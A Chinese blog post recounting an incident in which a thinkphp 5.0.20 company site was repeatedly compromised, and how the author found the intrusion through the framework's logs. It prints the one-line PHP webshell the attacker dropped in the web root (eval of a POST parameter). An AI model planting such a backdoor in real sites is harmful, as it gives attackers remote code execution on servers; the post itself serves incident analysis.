真实黑客案例:thinkphp5网站一键变肉鸡
发布于 作者:苏南大叔 来源:程序如此灵动~本篇文章中,苏南大叔将要描述一个真实案例:黑客不知道通过什么方式,一直修改某公司的专题页面内容。某公司的运维大哥,急得头发都白了,连续N次被黑,饭碗马上就不保了。出于为兄弟排难解忧的目的,苏南大叔只好出马为他排查代码漏洞。
拿到的这份代码就是基于thinkphp@5.0.20
的,而且默认开启了thinkphp
的log
日志功能。那么,最终的线索也就是从这里发现的。本来以为是老版本的漏洞呢,结果thinkphp@5.0.20
这么新的版本里面,都存在着这么大的漏洞,真心是惊出一身冷汗啊。
漏洞描述
据运维兄弟描述,网站的根目录下面定期会生成一个名为xxx.php
的文件,并且这个奇怪的.php
文件打开之后,就是一个非常典型的一句话木马。
@eval($_POST[ggsmd]);
后记
虽然为运维找到了漏洞所在,不过他们还是仅仅通过修改权限的办法暂时做了处理,话说这漏洞可是可以执行任何函数的啊。人家不生成文件,就不能执行别的函数了么... 治标不治本啊...
不过目前,阿里云也会智能检测到异常请求,自动封锁IP,不过一样治标不治本。
总结
其实,本文的主要内容,是通过查看thinkphp
的log
文件,苏南大叔在访客记录功能中发现这个非常邪门的入侵方式的。所以,站点日志还是比较有用的,对吧?更多thinkphp
文章,请点击苏南大叔的博客:


本站采用创作共用版权协议, 要求署名、非商业用途和相同方式共享。
转载本站内容必须也遵循“署名-非商业用途-相同方式共享”的创作共用协议。
未经许可,规模化镜像抄袭本站内容的行为,将会根据有关法律法规进行维权。
《程序如此灵动~》下所有原创文章,如被用于商业用途,请您按规定支付稿费。
转载本站内容必须也遵循“署名-非商业用途-相同方式共享”的创作共用协议。
未经许可,规模化镜像抄袭本站内容的行为,将会根据有关法律法规进行维权。
《程序如此灵动~》下所有原创文章,如被用于商业用途,请您按规定支付稿费。
本站的忠实读者小伙伴,正在阅读下面这些文章:
前来学习
看看啊看看
学习下 大佬
立刻开口打破0评论
强大,学习一下
学习下
留个言
打破0评论